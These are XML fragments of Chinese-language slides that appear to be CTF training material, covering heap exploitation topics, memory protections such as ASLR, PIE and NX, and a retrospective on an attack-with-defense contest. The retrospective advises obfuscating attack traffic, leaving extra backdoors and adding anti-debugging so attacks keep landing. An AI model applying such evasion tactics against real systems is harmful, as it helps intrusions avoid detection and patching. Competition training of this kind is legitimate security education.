            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>AWD</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" b="1"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8CB0A884-696A-4DC1-B605-06733C741227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2485559" y="2120130"/>
            <a:ext cx="5489064" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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堆管理器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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堆概述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Areana</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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Chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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Bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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堆漏洞与其利用</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00084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93C0663-927A-4C0F-A8BD-51B5E9BD1F34}"/>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999413" y="1062257"/>
            <a:ext cx="10193173" cy="5506218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53E88B0F-B4CC-4AE2-985B-A4A5F9D4034C}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进程虚拟地址空间</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560187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4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84B8FCB-0BFE-46D0-8AAB-9C8149CE69CD}"/>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堆利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>| bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1400C16B-BA15-428D-A9E4-15DD36083A68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1330002" y="1527193"/>
            <a:ext cx="953199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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>分析流量的时候才发现平台提供的流量只有进来的流量, 没有从服务器返回的流量, 所以看不到完整的交互, 所以根据流量生成exp的脚本几乎没怎么用到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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>打别人的时候没有加混淆, 打了3, 4轮就打不到了, 都被patch了, 而且还看到了别人用我们的流量打我们, 不得不说有些队复用效率太高了</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打别的队的时候一定要加混淆</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>awd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>题目的话出题的时候可以多留几个后门</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>要不然也不会像这次一样打个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>轮就打不了了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>而且也可以加一些反调手段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>争取可以多打几轮</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>较新颖的姿势一般不会出现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>awd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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761807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7344ED5-3D2F-44DB-9DBF-AEA8068E8317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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D62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="10086159" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ex1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内存保护措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CB0A884-696A-4DC1-B605-06733C741227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2230582" y="2287184"/>
            <a:ext cx="7730836" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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PIE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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the NX bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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Canary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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RELRO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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8357586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4D43EEB-4C07-462C-88E5-884E754BC0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574373" y="1982410"/>
            <a:ext cx="9451626" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Address Space Layout Randomization)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED9C22A-5D8D-45A8-AFE4-EA789B4661AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530527" y="2274798"/>
            <a:ext cx="6930921" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN"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zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统的防护措施，程序装载时生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>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zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/proc/sys/kernel/randomize_va_space = 0：没有随机化。即关闭 ASLR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>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zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/proc/sys/kernel/randomize_va_space = 1：保留的随机化。共享库、栈、mmap() 以及 VDSO 将被随机化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>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zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/proc/sys/kernel/randomize_va_space = 2：完全的随机化。在randomize_va_space = 1的基础上，通过 brk() 分配的内存空间也将被随机化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A29CE5CC-8CD5-44F7-9E04-FC0F15795CFA}"/>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内存保护措施 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>| ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157449754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4D43EEB-4C07-462C-88E5-884E754BC0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1822232" y="2630775"/>
            <a:ext cx="8547533" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>PIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Position-Independent Executable)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17313B0F-0FE6-4A22-8675-66671999FA13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4039382" y="3313565"/>
            <a:ext cx="4113235" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序的防护措施，编译时生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>随机化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件的映射地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>开启 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>之后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>才会生效</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9331CE3-3F4F-46C3-B115-FBBE4D0060E7}"/>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内存保护措施 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>| PIE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102313866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4D43EEB-4C07-462C-88E5-884E754BC0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2376374" y="2272445"/>
            <a:ext cx="7643439" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>The NX bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(the No-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eXecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bits)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ECC1460-F870-4071-A98C-D5293B8E0327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2269141" y="2857220"/>
            <a:ext cx="7280856" cy="2308324"/>
          </a:xfrm>
